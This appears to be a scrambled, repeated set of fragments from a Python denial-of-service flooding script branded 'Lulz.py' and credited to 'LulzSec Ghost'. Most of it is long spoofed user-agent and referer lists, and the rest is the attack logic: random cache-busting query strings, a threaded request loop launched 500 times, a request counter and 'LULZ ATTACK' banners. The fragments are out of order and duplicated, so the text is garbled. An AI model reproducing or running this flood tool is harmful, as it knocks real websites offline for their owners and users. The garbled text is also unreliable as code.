,' :: /`-._| | | || ' :", "Robot v1.52 (http://www.acoon.de)') headers_useragents.append('Acoon-Robot 4.0.x.[xx] (http://www.acoon.de)') headers_useragents.append('Acoon-Robot v3.xx (http://www.acoon.de and http://www.acoon.com)') headers_useragents.append('Acorn/Nutch-0.9 (Non-Profit", "PalmOS) PLink 2.56b') headers_useragents.append('Mozilla/5.0 (PDA; NF35WMPRO/1.0; like Gecko) NetFront/3.5') headers_useragents.append('Mozilla/4.08 (Windows; Mobile Content", "heritrix/1.12.1 +http://arquivo-web.fccn.pt)') headers_useragents.append('ASAHA Search Engine Turkey V.001 (http://www.asaha.com/)') headers_useragents.append('Asahina-Antenna/1.x') headers_useragents.append('Asahina-Antenna/1.x (libhina.pl/x.x ; libtime.pl/x.x)')", "(v40) (Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('Cocoal.icio.us/1.0 (v38) (Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('DomainsDB.net MetaCrawler", "headers_useragents.append('atSpider/1.0') headers_useragents.append('Attentio/Nutch-0.9-dev (Attentios beta blog crawler; www.attentio.com; <EMAIL>)') headers_useragents.append('AU-MIC/2.0 MMP/2.0') headers_useragents.append('AUDIOVOX-SMT5600') headers_useragents.append('augurfind') headers_useragents.append('augurnfind", "Chrome/41.0.2226.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36')", "bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") bots.append(\"http://validator.w3.org/check?uri=\") 
bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\")", "dot org)') headers_useragents.append('ActiveBookmark 1.x') headers_useragents.append('Activeworlds') headers_useragents.append('ActiveWorlds/3.xx (xxx)') headers_useragents.append('Ad Muncher v4.xx.x') headers_useragents.append('Ad Muncher v4x", "headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) BlackHawk/1.0.195.0 Chrome/127.0.0.1", "Version/5.0 Safari/533.16') headers_useragents.append('Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/1.22 (compatible; MSIE 5.01;') headers_useragents.append('PalmOS 3.0) EudoraWeb 2.1')", "Priv8 Privada da LulzSec Ghost\" if len(sys.argv)== 3: if sys.argv[2]==\"safe\": set_safe() url =", "Browser (http://www.avantbrowser.com)') headers_useragents.append('AVSearch-1.0(<EMAIL>)') headers_useragents.append('AVSearch-2.0-fusionIdx-14-CompetitorWebSites') headers_useragents.append('AVSearch-3.0(AltaVista/AVC)') headers_useragents.append('AWeb') headers_useragents.append('axadine/ (Axadine Crawler; http://www.axada.de/; )') headers_useragents.append('AxmoRobot -", "<EMAIL>') headers_useragents.append('amaya/x.xx libwww/x.x.x') headers_useragents.append('AmfibiBOT') headers_useragents.append('Amfibibot/0.06 (Amfibi Web Search; http://www.amfibi.com; <EMAIL>)') headers_useragents.append('Amfibibot/0.07 (Amfibi Robot;", "Bird') keyword_top.append('Conchita Wurst') keyword_top.append('ISIS') keyword_top.append('Frozen') keyword_top.append('014 Sochi Winter Olympics') keyword_top.append('IPhone') keyword_top.append('Samsung Galaxy S5')", "Linux; Opera') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 3.0.1; en-us; A500 
Build/HRI66)') headers_useragents.append('Mozilla/5.0 (X11; Linux", "Safari/537.36') headers_useragents.append('Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows", "OS X 10.4.11)') headers_useragents.append('Mozilla/5.0 (Danger hiptop 3.4; U; AvantGo 3.2)') headers_useragents.append('Mozilla/3.0 (compatible; AvantGo", "`:`. ,' \\ /-._; | : : :: ,. . ,' :: /`-._|", "1.1 (www.walhello.com)') headers_useragents.append('Apple iPhone v1.1.4 CoreMedia v1.0.0.4A102') headers_useragents.append('Apple-PubSub/65.1.1') headers_useragents.append('ArabyBot (compatible; Mozilla/5.0; GoogleBot; FAST", "Checkomat Aberja Hybridsuchmaschine (Germany)') headers_useragents.append('abot/0.1 (abot; http://www.abot.com; <EMAIL>)') headers_useragents.append('About/0.1libwww-perl/5.47') headers_useragents.append('Accelatech RSSCrawler/0.4') headers_useragents.append('accoona Accoona", "Chrome/37.0.2062.124 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0", "By V3I0p3r' print 'Script Priv8 Privada da LulzSec Ghost' print \"\\a\" print \\", "on www.axmo.com search engine.') headers_useragents.append('Azureus 2.x.x.x') headers_useragents.append('BabalooSpider/1.3 (BabalooSpider; http://www.babaloo.si; <EMAIL>)') headers_useragents.append('BaboomBot/1.x.x (+http://www.baboom.us)') headers_useragents.append('BackStreet", "(Linux; Android 4.1.1;') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.4; en-us;') headers_useragents.append('Version/4.0 Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux;", "keyword_top.append('adidas') keyword_top.append('ask.fm') keyword_top.append('adele') keyword_top.append('5x nexus') keyword_top.append('espn') keyword_top.append('uggs') keyword_top.append('uber') keyword_top.append('american eagle') keyword_top.append('jessica simpson') 
keyword_top.append('jacket')", "v1.52 (http://www.acoon.de)') headers_useragents.append('Acoon-Robot 4.0.x.[xx] (http://www.acoon.de)') headers_useragents.append('Acoon-Robot v3.xx (http://www.acoon.de and http://www.acoon.com)') headers_useragents.append('Acorn/Nutch-0.9 (Non-Profit Search", "AVS EVAL <EMAIL>') headers_useragents.append('AltaVista Intranet V2.0 Compaq Altavista Eval <EMAIL>') headers_useragents.append('AltaVista Intranet V2.0", "<EMAIL>)') headers_useragents.append('About/0.1libwww-perl/5.47') headers_useragents.append('Accelatech RSSCrawler/0.4') headers_useragents.append('accoona Accoona Search robot') headers_useragents.append('Accoona-AI-Agent/1.1.1 (crawler at accoona dot", "headers_useragents.append('OPWV-SDK UP.Browser/7.0.2.3.119 (GUI) MMP/2.0 Push/PO') headers_useragents.append('UP.Browser/6.1.0.1.140 (Google CHTML Proxy/1.0)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 5.0;", "keyword_top.append('Ipad Air') keyword_top.append('Facebook') keyword_top.append('Anonymous') keyword_top.append('DJ Bach') keyword_top.append('adidas') keyword_top.append('ask.fm') keyword_top.append('adele') keyword_top.append('5x nexus') keyword_top.append('espn') keyword_top.append('uggs')", "\"/\" m = re.search('http\\://([^/]*)/?.*', url) host = m.group(1) for i in range(500): t", "headers_useragents.append('Arquivo-web-crawler (compatible; heritrix/1.12.1 +http://arquivo-web.fccn.pt)') headers_useragents.append('ASAHA Search Engine Turkey V.001 (http://www.asaha.com/)') headers_useragents.append('Asahina-Antenna/1.x') headers_useragents.append('Asahina-Antenna/1.x (libhina.pl/x.x", "headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=') headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=') 
headers_referers.append('http://www.bing.com/search?q=') headers_referers.append('http://search.yahoo.com/search?p=') headers_referers.append('http://www.ask.com/web?q=') headers_referers.append('http://search.lycos.com/web/?q=') headers_referers.append('http://busca.uol.com.br/web/?q=') headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=') headers_referers.append('http://www.dmoz.org/search/search?q=') headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')", "Sitemap Generator/1.0 (+http://www.micro-sys.dk/products/sitemap-generator/) miggibot/2006.01.24') headers_useragents.append('AbachoBOT') headers_useragents.append('AbachoBOT (Mozilla compatible)') headers_useragents.append('ABCdatos BotLink/5.xx.xxx#BBL') headers_useragents.append('Aberja Checkomat Aberja", "#print e.code set_flag(1) print '[+]~>LULZ ATTACK STARTRD<~' print '[+]~~>LULZ ATTACK STARTRD<~~[+] ' code=500", "headers_useragents.append('Aplix_SANYO_browser/1.x (Japanese)') headers_useragents.append('Aplix_SEGASATURN_browser/1.x (Japanese)') headers_useragents.append('Aport') headers_useragents.append('appie 1.1 (www.walhello.com)') headers_useragents.append('Apple iPhone v1.1.4 CoreMedia v1.0.0.4A102')", "monitors http threads and counts requests class MonitorThread(threading.Thread): def run(self): previous=request_counter while flag==0:", "headers_useragents.append('Ace Explorer') headers_useragents.append('Ack (http://www.ackerm.com/)') headers_useragents.append('AcoiRobot') headers_useragents.append('Acoon Robot v1.50.001') headers_useragents.append('Acoon Robot v1.52 (http://www.acoon.de)') headers_useragents.append('Acoon-Robot", "~~~ ~~~ ~~~ ~~~ \"\"\" #http request def httpcall(url): useragent_list() referer_list() code=0 if", "Si Le Roi') keyword_top.append('Ebola') keyword_top.append('Malaysia Airlines Flight 370') keyword_top.append('ALS Ice Bucket Challenge') keyword_top.append('Flappy", "U; Android 4.1.2; en-gb; GT-I9300 Build/JZO54K)') 
headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30')", "headers_useragents.append('*/Nutch-0.9-dev') headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have Good Day)') headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de') headers_useragents.append('123spider-Bot (Version: 1.02) powered by", "Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 4.0; WOW64)", "._O O_. ; ; : `. // // // // ,' / ~~~`.______//____//____//____//_______,'~", "headers_useragents.append('Accoona-AI-Agent/1.1.1 (crawler at accoona dot com)') headers_useragents.append('Accoona-AI-Agent/1.1.2 (aicrawler at accoonabot dot com)') headers_useragents.append('Ace", "global request_counter request_counter+=1 def set_flag(val): global flag flag=val def set_safe(): global safe safe=1", "X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36') headers_useragents.append('Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36", "4.0.3; fr-fr; MIDC41') headers_useragents.append('Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; U;", "headers_useragents.append('BanBots/1.2 (<EMAIL>)') headers_useragents.append('Barca/2.0.xxxx') headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)') headers_useragents.append('(Privoxy/1.0)') headers_useragents.append('*/Nutch-0.9-dev') headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have Good Day)') headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1", "buildblock(size): out_str = '' for i in range(0, size): a = random.randint(65, 90)", "HTTP/1.0.1') headers_useragents.append('Aplix_SANYO_browser/1.x (Japanese)') headers_useragents.append('Aplix_SEGASATURN_browser/1.x (Japanese)') headers_useragents.append('Aport') headers_useragents.append('appie 1.1 (www.walhello.com)') 
headers_useragents.append('agadine/1.x.x (+http://www.agada.de)') headers_useragents.append('Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)') headers_useragents.append('AgentName/0.1", "else: inc_counter() urllib2.urlopen(request) return(code) #http caller thread class HTTPThread(threading.Thread): def run(self): try: while", ": \\ `--. ) /|-._: : | \\ \\ / / :_| ;`-._;", "global headers_referers headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=') headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=') headers_referers.append('http://www.bing.com/search?q=') headers_referers.append('http://search.yahoo.com/search?p=') headers_referers.append('http://www.ask.com/web?q=') headers_referers.append('http://search.lycos.com/web/?q=') headers_referers.append('http://busca.uol.com.br/web/?q=')", "(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/5.0", ".NET CLR 2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')", "headers_useragents.append('AmigaVoyager/3.4.4 (MorphOS/PPC native)') headers_useragents.append('AmiTCP Miami (AmigaOS 2.04)') headers_useragents.append('Amoi 8512/R21.0 NF-Browser/3.3') headers_useragents.append('amzn_assoc') headers_useragents.append('AnnoMille spider", "5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows", "like Gecko) Chrome/41.0.2225.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3", "~~ ~~~ ~~~ ~~~ ~~~ \"\"\" #http request def httpcall(url): useragent_list() 
referer_list() code=0", "urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10))) request.add_header('User-Agent', random.choice(headers_useragents)) request.add_header('Cache-Control', 'no-cache')", "Safari/533.1') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Macintosh;", "Eval <EMAIL>') headers_useragents.append('AltaVista Intranet V2.0 evreka.com <EMAIL>') headers_useragents.append('AltaVista V2.0B <EMAIL>') headers_useragents.append('amaya/x.xx libwww/x.x.x') headers_useragents.append('AmfibiBOT')", "3.2.1; en-gb; A501 Build/HTK55D)') headers_useragents.append('Opera/9.80 (Android 3.2.1; Linux; Opera') headers_useragents.append('Mozilla/5.0 (Linux; U; Android", "Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36') headers_useragents.append('Mozilla/5.0", "Build/JRO03D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.2; GT-I9300 Build/JZO54K)')", "url + \"/\" m = re.search('http\\://([^/]*)/?.*', url) host = m.group(1) for i in", "\\ \\ _|/| \\ /-./_ \\; \\ \\,;' \\ ,\\ / \\: `:\\", "4.1; 153x130; g4)') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 3.2.1; en-gb; A501 Build/HTK55D)') headers_useragents.append('Opera/9.80 (Android", "Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE", "Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1; WOW64)", "U; Android 3.2.1; en-gb; A501 Build/HTK55D)') headers_useragents.append('Opera/9.80 (Android 3.2.1; Linux; Opera') 
headers_useragents.append('Mozilla/5.0 (Linux;", "Windows CE/1.0.1) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; SL-C750/1.0,Embedix/Qtopia/1.3.0) NetFront/3.0 Zaurus C750') headers_useragents.append('WM5 PIE') headers_useragents.append('Xiino/1.0.9E [en]", "_// _// ~ _// ~ ~ / / / / / / /", "headers_useragents.append('BaboomBot/1.x.x (+http://www.baboom.us)') headers_useragents.append('BackStreet Browser 3.x') headers_useragents.append('BaiduImagespider+(+http://www.baidu.jp/search/s308.html)') headers_useragents.append('BaiDuSpider') headers_useragents.append('Baiduspider+(+http://help.baidu.jp/system/05.html)') headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider.htm)') headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider_jp.html)') headers_useragents.append('Balihoo/Nutch-1.0-dev (Crawler for", "X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('DomainsDB.net MetaCrawler v.0.9.7c (http://domainsdb.net/)') headers_useragents.append('GSiteCrawler/v1.20 rev. 273 (http://gsitecrawler.com/)') headers_useragents.append('GSiteCrawler/v1.12 rev. 
260", "headers_useragents.append('Mozilla/2.0 (compatible; MSIE 3.02;') headers_useragents.append('Windows CE; PPC; 240x320)') headers_useragents.append('Mozilla/5.0 (X11; U; Linux armv6l;", "3: if sys.argv[2]==\"safe\": set_safe() url = sys.argv[1] if url.count(\"/\")==2: url = url +", "CLR 2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET", "(Powered by Newsbrain)') headers_useragents.append('AlkalineBOT/1.3') headers_useragents.append('AlkalineBOT/1.4 (1.4.0326.0 RTM)') headers_useragents.append('Allesklar/0.1 libwww-perl/5.46') headers_useragents.append('Alligator 1.31 (www.nearsoftware.com)') headers_useragents.append('Allrati/1.1", "2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)') headers_useragents.append('Mozilla/4.0 (compatible;", "U; Android 4.0.3; fr-fr; MIDC41') headers_useragents.append('Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30') headers_useragents.append('Mozilla/5.0", "headers_useragents.append('Accelatech RSSCrawler/0.4') headers_useragents.append('accoona Accoona Search robot') headers_useragents.append('Accoona-AI-Agent/1.1.1 (crawler at accoona dot com)') headers_useragents.append('Accoona-AI-Agent/1.1.2", "(compatible; MSIE 3.02;') headers_useragents.append('Windows CE; PPC; 240x320)') headers_useragents.append('Mozilla/5.0 (X11; U; Linux armv6l; rv", "host='' headers_useragents=[] headers_referers=[] request_counter=0 flag=0 safe=0 def inc_counter(): global request_counter request_counter+=1 def set_flag(val):", "http://asked.jp; epicurus at gmail dot com)') headers_useragents.append('ASPSeek/1.2.5') headers_useragents.append('ASPseek/1.2.9d') headers_useragents.append('ASPSeek/1.2.x') headers_useragents.append('ASPSeek/1.2.xa') headers_useragents.append('ASPseek/1.2.xx') headers_useragents.append('ASPSeek/1.2.xxpre') headers_useragents.append('ASSORT/0.10')", 
"headers_useragents.append('AppleWebKit/533.1 (KHTML, like Gecko)') headers_useragents.append('Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML,", "balihoo dot com)') headers_useragents.append('BanBots/1.2 (<EMAIL>)') headers_useragents.append('Barca/2.0.xxxx') headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)') headers_useragents.append('(Privoxy/1.0)') headers_useragents.append('*/Nutch-0.9-dev') headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have Good", "(.NET CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0 (PlayStation 4 1.52) AppleWebKit/536.26 (KHTML, like Gecko)') headers_useragents.append('Mozilla/5.0 (Windows", "headers_useragents.append('Allesklar/0.1 libwww-perl/5.46') headers_useragents.append('Alligator 1.31 (www.nearsoftware.com)') headers_useragents.append('Allrati/1.1 (+)') headers_useragents.append('AltaVista Intranet V2.0 AVS EVAL <EMAIL>')", "(v38) (Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('DomainsDB.net MetaCrawler v.0.9.7c (http://domainsdb.net/)') headers_useragents.append('GSiteCrawler/v1.20 rev. 273 (http://gsitecrawler.com/)')", "+(www.21seek.com A Real artificial intelligence search engine China)') headers_useragents.append('AideRSS/1.0 (aiderss.com)') headers_useragents.append('aipbot/1.0 (aipbot; http://www.aipbot.com;", "Privada da LulzSec Ghost' print \"\\a\" print \\ \"\"\" . _____|\\ _.--| LOL", "v.0.9.7c (http://domainsdb.net/)') headers_useragents.append('GSiteCrawler/v1.20 rev. 273 (http://gsitecrawler.com/)') headers_useragents.append('GSiteCrawler/v1.12 rev. 260 (http://gsitecrawler.com/)') headers_useragents.append('GSiteCrawler/v1.06 rev. 
251", "AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D)') headers_useragents.append('AppleWebKit/535.19 (KHTML,", "Gecko) Chrome/41.0.2225.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0", "6.4; http://www.araby.com;)') headers_useragents.append('ArachBot') headers_useragents.append('Arachnoidea (<EMAIL>)') headers_useragents.append('aranhabot') headers_useragents.append('ArchitextSpider') headers_useragents.append('archive.org_bot') headers_useragents.append('Argus/1.1 (Nutch; http://www.simpy.com/bot.html; feedback at", "GT-N5100 Build/JZO54K)') headers_useragents.append('CSSCheck/1.2.2') headers_useragents.append('Cynthia 1.0') headers_useragents.append('HTMLParser/1.6') headers_useragents.append('P3P Validator') headers_useragents.append('W3C_Validator/1.654') headers_useragents.append('W3C_Validator/1.606') headers_useragents.append('W3C_Validator/1.591') headers_useragents.append('W3C_Validator/1.575') headers_useragents.append('W3C_Validator/1.555')", "headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') # generates a Keyword list def keyword_list(): global keyword_top keyword_top.append('Ecosistema')", "headers_useragents.append('Asahina-Antenna/1.x (libhina.pl/x.x ; libtime.pl/x.x)') headers_useragents.append('ask.24x.info') headers_useragents.append('AskAboutOil/0.06-rcp (Nutch; http://www.nutch.org/docs/en/bot.html; nutch-agent@<EMAIL>)') headers_useragents.append('asked/Nutch-0.8 (web crawler; http://asked.jp;", "out_str += chr(a) return(out_str) def usage(): print 'Pra usar python Lulz.py <url>' print", ",\\ / \\: `:\\ \\ // `:`. 
,' \\ /-._; | : :", "Android 4.1.2; en-gb; GT-I9300 Build/JZO54K)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0", "headers_useragents headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) BlackHawk/1.0.195.0", "headers_useragents.append('BackStreet Browser 3.x') headers_useragents.append('BaiduImagespider+(+http://www.baidu.jp/search/s308.html)') headers_useragents.append('BaiDuSpider') headers_useragents.append('Baiduspider+(+http://help.baidu.jp/system/05.html)') headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider.htm)') headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider_jp.html)') headers_useragents.append('Balihoo/Nutch-1.0-dev (Crawler for Balihoo.com search", "http://www.amfibi.com; <EMAIL>)') headers_useragents.append('Amfibibot/0.07 (Amfibi Robot; http://www.amfibi.com; <EMAIL>)') headers_useragents.append('amibot') headers_useragents.append('Amiga-AWeb/3.4.167SE') headers_useragents.append('AmigaVoyager/3.4.4 (MorphOS/PPC native)') headers_useragents.append('AmiTCP", "(code==800) & (safe==1): set_flag(2) except Exception, ex: pass # monitors http threads and", "Build/ICL53F)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Android; Tablet; rv:18.0) Gecko/18.0", "return(code) #http caller thread class HTTPThread(threading.Thread): def run(self): try: while flag<2: code=httpcall(url) if", "http://www.nutch.org/docs/en/bot.html; nutch-agent@<EMAIL>)') headers_useragents.append('asked/Nutch-0.8 (web crawler; http://asked.jp; epicurus at gmail dot com)') headers_useragents.append('ASPSeek/1.2.5') headers_useragents.append('ASPseek/1.2.9d')", "headers_useragents.append('Amfibibot/0.07 (Amfibi Robot; http://www.amfibi.com; <EMAIL>)') headers_useragents.append('amibot') 
headers_useragents.append('Amiga-AWeb/3.4.167SE') headers_useragents.append('AmigaVoyager/3.4.4 (MorphOS/PPC native)') headers_useragents.append('AmiTCP Miami (AmigaOS", ".---''---, The ;..__..' _... Lulz ,'/ ;|/..--'' \\ Boat ,'_/.-/': : _..-'''/ /", "like Gecko) Version/5.0 Safari/533.16') headers_useragents.append('Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/1.22 (compatible; MSIE 5.01;') headers_useragents.append('PalmOS 3.0)", "like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Mobile Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.2; en-au; GT-N5100 Build/JZO54K)')", "U; AvantGo 3.2)') headers_useragents.append('Mozilla/3.0 (compatible; AvantGo 3.2)') headers_useragents.append(' Mozilla/5.0 (compatible; AvantGo 3.2;') headers_useragents.append('ProxiNet;", "headers_useragents.append('amaya/9.54 libwww/5.4.0') headers_useragents.append('amaya/9.52 libwww/5.4.0') headers_useragents.append('amaya/9.51 libwww/5.4.0') headers_useragents.append('amaya/8.8.5 libwww/5.4.0') headers_useragents.append('amaya/11.2 amaya/5.4.0') headers_useragents.append('amaya/11.1 amaya/5.4.0') headers_useragents.append('Cocoal.icio.us/1.0", "in range(0, size): a = random.randint(65, 90) out_str += chr(a) return(out_str) def usage():", "bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") return(bots) #builds random ascii string def buildblock(size):", "1.x') headers_useragents.append('Aplix HTTP/1.0.1') headers_useragents.append('Aplix_SANYO_browser/1.x (Japanese)') headers_useragents.append('Aplix_SEGASATURN_browser/1.x (Japanese)') headers_useragents.append('Aport') 
headers_useragents.append('appie 1.1 (www.walhello.com)') headers_useragents.append('agadine/1.x.x (+http://www.agada.de)')", "-lULZ Finish\" #execute if len(sys.argv) < 2: usage() sys.exit() else: if sys.argv[1]==\"help\": usage()", "Chrome/41.0.2227.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36')", "Gecko) Version/4.0 Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91)') headers_useragents.append('App3leWebKit/53.1 (KHTML,", "1.0') headers_useragents.append('Avant Browser (http://www.avantbrowser.com)') headers_useragents.append('AVSearch-1.0(<EMAIL>)') headers_useragents.append('AVSearch-2.0-fusionIdx-14-CompetitorWebSites') headers_useragents.append('AVSearch-3.0(AltaVista/AVC)') headers_useragents.append('AWeb') headers_useragents.append('axadine/ (Axadine Crawler; http://www.axada.de/; )')", "\\ Boat ,'_/.-/': : _..-'''/ / | \\ \\ _|/| \\ /-./_ \\;", "Gecko) Version/5.0 Safari/533.16') headers_useragents.append('Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/1.22 (compatible; MSIE 5.01;') headers_useragents.append('PalmOS 3.0) EudoraWeb", ".NET CLR 2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1;", "obeys robots.txt and robots meta tags ; http://balihoo.com/index.aspx; robot at balihoo dot com)')", "Mobile Safari/533.1') headers_useragents.append('Mozilla/1.22 (compatible; MSIE 5.01;') headers_useragents.append('PalmOS 3.0) EudoraWeb 2.1') headers_useragents.append('Mozilla/4.0 (compatible; MSIE", "ex: pass # monitors http threads and counts requests class MonitorThread(threading.Thread): def run(self):", "print \"\\a\" print \\ \"\"\" . 
_____|\\ _.--| LOL |: <____|.----|| .---''---, The", "http://www.abot.com; <EMAIL>)') headers_useragents.append('About/0.1libwww-perl/5.47') headers_useragents.append('Accelatech RSSCrawler/0.4') headers_useragents.append('accoona Accoona Search robot') headers_useragents.append('Accoona-AI-Agent/1.1.1 (crawler at accoona", "intelligence search engine China)') headers_useragents.append('AideRSS/1.0 (aiderss.com)') headers_useragents.append('aipbot/1.0 (aipbot; http://www.aipbot.com; a<EMAIL>)') headers_useragents.append('aipbot/2-beta (aipbot dev;", "CLR 2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)') headers_useragents.append('Mozilla/4.0", "(libhina.pl/x.x ; libtime.pl/x.x)') headers_useragents.append('ask.24x.info') headers_useragents.append('AskAboutOil/0.06-rcp (Nutch; http://www.nutch.org/docs/en/bot.html; nutch-agent@<EMAIL>)') headers_useragents.append('asked/Nutch-0.8 (web crawler; http://asked.jp; epicurus", "AvantGo 3.2)') headers_useragents.append('Mozilla/3.0 (compatible; AvantGo 3.2)') headers_useragents.append(' Mozilla/5.0 (compatible; AvantGo 3.2;') headers_useragents.append('ProxiNet; Danger", "Gecko) Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/5.0 